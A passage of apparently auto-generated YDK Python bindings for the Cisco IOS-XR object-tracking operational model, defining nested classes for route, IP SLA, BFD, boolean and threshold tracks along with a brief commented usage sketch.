self.yang_name = "interface-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.interface_name = None
self._segment_path = lambda: "interface-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route-brief/track-info-brief/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks, ['interface_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks']['meta_info']
class RouteTracks(_Entity_):
"""
track type route info
.. attribute:: prefix
Prefix
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_length
Prefix Length
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: vrf
VRF Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: next_hop
Next Hop
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks, self).__init__()
self.yang_name = "route-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.uint32, 'prefix'), ['int'])),
('prefix_length', (YLeaf(YType.uint32, 'prefix-length'), ['int'])),
('vrf', (YLeaf(YType.str, 'vrf'), ['str'])),
('next_hop', (YLeaf(YType.str, 'next-hop'), ['str'])),
])
self.prefix = None
self.prefix_length = None
self.vrf = None
self.next_hop = None
self._segment_path = lambda: "route-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route-brief/track-info-brief/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks, ['prefix', 'prefix_length', 'vrf', 'next_hop'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks']['meta_info']
class IpslaTracks(_Entity_):
"""
track type rtr info
.. attribute:: ipsla_op_id
Op Id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rtt
Latest RTT
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code
Latest Return Code
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code_string
Latest Ret Code String
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks, self).__init__()
self.yang_name = "ipsla-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipsla_op_id', (YLeaf(YType.uint32, 'ipsla-op-id'), ['int'])),
('rtt', (YLeaf(YType.uint32, 'rtt'), ['int'])),
('return_code', (YLeaf(YType.uint32, 'return-code'), ['int'])),
('return_code_string', (YLeaf(YType.str, 'return-code-string'), ['str'])),
])
self.ipsla_op_id = None
self.rtt = None
self.return_code = None
self.return_code_string = None
self._segment_path = lambda: "ipsla-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route-brief/track-info-brief/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks, ['ipsla_op_id', 'rtt', 'return_code', 'return_code_string'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks']['meta_info']
class BfdTracks(_Entity_):
"""
track type bfdrtr info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: destination_address
Destination Address
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rate
Rate
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: debounce_count
Debounce Count
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks, self).__init__()
self.yang_name = "bfd-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('destination_address', (YLeaf(YType.uint32, 'destination-address'), ['int'])),
('rate', (YLeaf(YType.uint32, 'rate'), ['int'])),
('debounce_count', (YLeaf(YType.uint32, 'debounce-count'), ['int'])),
])
self.interface_name = None
self.destination_address = None
self.rate = None
self.debounce_count = None
self._segment_path = lambda: "bfd-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route-brief/track-info-brief/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks, ['interface_name', 'destination_address', 'rate', 'debounce_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4RouteBrief']['meta_info']
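# Usage sketch: iterating the IPv4-route brief view and pulling the route
# details from the per-entry discriminated union. 'provider' is as in the
# earlier sketches.
#
#     data = CRUDService().read(provider, ObjectTracking())
#     for brief in data.track_type_ipv4_route_brief.track_info_brief:
#         rt = brief.track_type_info.route_tracks
#         print(brief.tracke_name, rt.vrf, rt.next_hop)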
class TrackTypeIpv4Route(_Entity_):
"""
Object Tracking Type IPV4 route info
.. attribute:: track_info
track info
**type**\: list of :py:class:`TrackInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route, self).__init__()
self.yang_name = "track-type-ipv4-route"
self.yang_parent_name = "object-tracking"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-info", ("track_info", ObjectTracking.TrackTypeIpv4Route.TrackInfo))])
self._leafs = OrderedDict()
self.track_info = YList(self)
self._segment_path = lambda: "track-type-ipv4-route"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route, [], name, value)
class TrackInfo(_Entity_):
"""
track info
.. attribute:: track_type_info
Track type information
**type**\: :py:class:`TrackTypeInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo>`
**config**\: False
.. attribute:: bool_tracks
boolean objects
**type**\: :py:class:`BoolTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo.BoolTracks>`
**config**\: False
.. attribute:: threshold_tracks
Threshold objects
**type**\: :py:class:`ThresholdTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo.ThresholdTracks>`
**config**\: False
.. attribute:: tracking_interaces
Tracking Interfaces
**type**\: :py:class:`TrackingInteraces <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackingInteraces>`
**config**\: False
.. attribute:: delayed
Is the state change delay counter in progress
**type**\: :py:class:`Delayed <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo.Delayed>`
**config**\: False
.. attribute:: tracke_name
Track Name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: type
Track type
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
.. attribute:: track_state
Track state
**type**\: bool
**config**\: False
.. attribute:: state_change_counter
State Change Counter
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: seconds_last_change
Seconds Last Change
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
**units**\: second
.. attribute:: threshold_up
User specified threshold upper limit
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: threshold_down
User specified threshold lower limit
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo, self).__init__()
self.yang_name = "track-info"
self.yang_parent_name = "track-type-ipv4-route"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-type-info", ("track_type_info", ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo)), ("bool-tracks", ("bool_tracks", ObjectTracking.TrackTypeIpv4Route.TrackInfo.BoolTracks)), ("threshold-tracks", ("threshold_tracks", ObjectTracking.TrackTypeIpv4Route.TrackInfo.ThresholdTracks)), ("tracking-interaces", ("tracking_interaces", ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackingInteraces)), ("delayed", ("delayed", ObjectTracking.TrackTypeIpv4Route.TrackInfo.Delayed))])
self._leafs = OrderedDict([
('tracke_name', (YLeaf(YType.str, 'tracke-name'), ['str'])),
('type', (YLeaf(YType.enumeration, 'type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
('state_change_counter', (YLeaf(YType.uint32, 'state-change-counter'), ['int'])),
('seconds_last_change', (YLeaf(YType.uint64, 'seconds-last-change'), ['int'])),
('threshold_up', (YLeaf(YType.uint32, 'threshold-up'), ['int'])),
('threshold_down', (YLeaf(YType.uint32, 'threshold-down'), ['int'])),
])
self.tracke_name = None
self.type = None
self.track_state = None
self.state_change_counter = None
self.seconds_last_change = None
self.threshold_up = None
self.threshold_down = None
self.track_type_info = ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo()
self.track_type_info.parent = self
self._children_name_map["track_type_info"] = "track-type-info"
self.bool_tracks = ObjectTracking.TrackTypeIpv4Route.TrackInfo.BoolTracks()
self.bool_tracks.parent = self
self._children_name_map["bool_tracks"] = "bool-tracks"
self.threshold_tracks = ObjectTracking.TrackTypeIpv4Route.TrackInfo.ThresholdTracks()
self.threshold_tracks.parent = self
self._children_name_map["threshold_tracks"] = "threshold-tracks"
self.tracking_interaces = ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackingInteraces()
self.tracking_interaces.parent = self
self._children_name_map["tracking_interaces"] = "tracking-interaces"
self.delayed = ObjectTracking.TrackTypeIpv4Route.TrackInfo.Delayed()
self.delayed.parent = self
self._children_name_map["delayed"] = "delayed"
self._segment_path = lambda: "track-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo, ['tracke_name', 'type', 'track_state', 'state_change_counter', 'seconds_last_change', 'threshold_up', 'threshold_down'], name, value)
class TrackTypeInfo(_Entity_):
"""
Track type information
.. attribute:: interface_tracks
track type interface info
**type**\: :py:class:`InterfaceTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.InterfaceTracks>`
**config**\: False
.. attribute:: route_tracks
track type route info
**type**\: :py:class:`RouteTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.RouteTracks>`
**config**\: False
.. attribute:: ipsla_tracks
track type rtr info
**type**\: :py:class:`IpslaTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.IpslaTracks>`
**config**\: False
.. attribute:: bfd_tracks
track type bfdrtr info
**type**\: :py:class:`BfdTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.BfdTracks>`
**config**\: False
.. attribute:: discriminant
discriminant
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo, self).__init__()
self.yang_name = "track-type-info"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface-tracks", ("interface_tracks", ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.InterfaceTracks)), ("route-tracks", ("route_tracks", ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.RouteTracks)), ("ipsla-tracks", ("ipsla_tracks", ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.IpslaTracks)), ("bfd-tracks", ("bfd_tracks", ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.BfdTracks))])
self._leafs = OrderedDict([
('discriminant', (YLeaf(YType.enumeration, 'discriminant'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
])
self.discriminant = None
self.interface_tracks = ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.InterfaceTracks()
self.interface_tracks.parent = self
self._children_name_map["interface_tracks"] = "interface-tracks"
self.route_tracks = ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.RouteTracks()
self.route_tracks.parent = self
self._children_name_map["route_tracks"] = "route-tracks"
self.ipsla_tracks = ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.IpslaTracks()
self.ipsla_tracks.parent = self
self._children_name_map["ipsla_tracks"] = "ipsla-tracks"
self.bfd_tracks = ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.BfdTracks()
self.bfd_tracks.parent = self
self._children_name_map["bfd_tracks"] = "bfd-tracks"
self._segment_path = lambda: "track-type-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo, ['discriminant'], name, value)
class InterfaceTracks(_Entity_):
"""
track type interface info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.InterfaceTracks, self).__init__()
self.yang_name = "interface-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.interface_name = None
self._segment_path = lambda: "interface-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/track-info/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.InterfaceTracks, ['interface_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.InterfaceTracks']['meta_info']
class RouteTracks(_Entity_):
"""
track type route info
.. attribute:: prefix
Prefix
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_length
Prefix Length
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: vrf
VRF Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: next_hop
Next Hop
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.RouteTracks, self).__init__()
self.yang_name = "route-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.uint32, 'prefix'), ['int'])),
('prefix_length', (YLeaf(YType.uint32, 'prefix-length'), ['int'])),
('vrf', (YLeaf(YType.str, 'vrf'), ['str'])),
('next_hop', (YLeaf(YType.str, 'next-hop'), ['str'])),
])
self.prefix = None
self.prefix_length = None
self.vrf = None
self.next_hop = None
self._segment_path = lambda: "route-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/track-info/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.RouteTracks, ['prefix', 'prefix_length', 'vrf', 'next_hop'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.RouteTracks']['meta_info']
class IpslaTracks(_Entity_):
"""
track type rtr info
.. attribute:: ipsla_op_id
Op Id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rtt
Latest RTT
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code
Latest Return Code
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code_string
Latest Ret Code String
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.IpslaTracks, self).__init__()
self.yang_name = "ipsla-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipsla_op_id', (YLeaf(YType.uint32, 'ipsla-op-id'), ['int'])),
('rtt', (YLeaf(YType.uint32, 'rtt'), ['int'])),
('return_code', (YLeaf(YType.uint32, 'return-code'), ['int'])),
('return_code_string', (YLeaf(YType.str, 'return-code-string'), ['str'])),
])
self.ipsla_op_id = None
self.rtt = None
self.return_code = None
self.return_code_string = None
self._segment_path = lambda: "ipsla-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/track-info/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.IpslaTracks, ['ipsla_op_id', 'rtt', 'return_code', 'return_code_string'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.IpslaTracks']['meta_info']
class BfdTracks(_Entity_):
"""
track type bfdrtr info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: destination_address
Destination Address
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rate
Rate
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: debounce_count
Debounce Count
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.BfdTracks, self).__init__()
self.yang_name = "bfd-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('destination_address', (YLeaf(YType.uint32, 'destination-address'), ['int'])),
('rate', (YLeaf(YType.uint32, 'rate'), ['int'])),
('debounce_count', (YLeaf(YType.uint32, 'debounce-count'), ['int'])),
])
self.interface_name = None
self.destination_address = None
self.rate = None
self.debounce_count = None
self._segment_path = lambda: "bfd-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/track-info/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.BfdTracks, ['interface_name', 'destination_address', 'rate', 'debounce_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.BfdTracks']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo']['meta_info']
class BoolTracks(_Entity_):
"""
boolean objects
.. attribute:: bool_track_info
bool track info
**type**\: list of :py:class:`BoolTrackInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo.BoolTracks.BoolTrackInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo.BoolTracks, self).__init__()
self.yang_name = "bool-tracks"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("bool-track-info", ("bool_track_info", ObjectTracking.TrackTypeIpv4Route.TrackInfo.BoolTracks.BoolTrackInfo))])
self._leafs = OrderedDict()
self.bool_track_info = YList(self)
self._segment_path = lambda: "bool-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo.BoolTracks, [], name, value)
class BoolTrackInfo(_Entity_):
"""
bool track info
.. attribute:: object_name
Object Name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: track_state
Track state
**type**\: bool
**config**\: False
.. attribute:: with_not
Track object with Not
**type**\: bool
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo.BoolTracks.BoolTrackInfo, self).__init__()
self.yang_name = "bool-track-info"
self.yang_parent_name = "bool-tracks"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('object_name', (YLeaf(YType.str, 'object-name'), ['str'])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
('with_not', (YLeaf(YType.boolean, 'with-not'), ['bool'])),
])
self.object_name = None
self.track_state = None
self.with_not = None
self._segment_path = lambda: "bool-track-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/track-info/bool-tracks/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo.BoolTracks.BoolTrackInfo, ['object_name', 'track_state', 'with_not'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo.BoolTracks.BoolTrackInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo.BoolTracks']['meta_info']
class ThresholdTracks(_Entity_):
"""
Threshold objects
.. attribute:: threshold_track_info
threshold track info
**type**\: list of :py:class:`ThresholdTrackInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo.ThresholdTracks.ThresholdTrackInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo.ThresholdTracks, self).__init__()
self.yang_name = "threshold-tracks"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("threshold-track-info", ("threshold_track_info", ObjectTracking.TrackTypeIpv4Route.TrackInfo.ThresholdTracks.ThresholdTrackInfo))])
self._leafs = OrderedDict()
self.threshold_track_info = YList(self)
self._segment_path = lambda: "threshold-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo.ThresholdTracks, [], name, value)
class ThresholdTrackInfo(_Entity_):
"""
threshold track info
.. attribute:: object_name
Object name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: track_state
Track state. True means track is up; False means track is down
**type**\: bool
**config**\: False
.. attribute:: weight
Weight is the number assigned to a track object. For a threshold weight (i.e., weighted sum) list, the weight is assigned by the user at configuration time. For a threshold percentage (i.e., percentage based) list, the weight is computed internally as (1/N)x100, where N is the number of objects in the list
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: percentage
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo.ThresholdTracks.ThresholdTrackInfo, self).__init__()
self.yang_name = "threshold-track-info"
self.yang_parent_name = "threshold-tracks"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('object_name', (YLeaf(YType.str, 'object-name'), ['str'])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
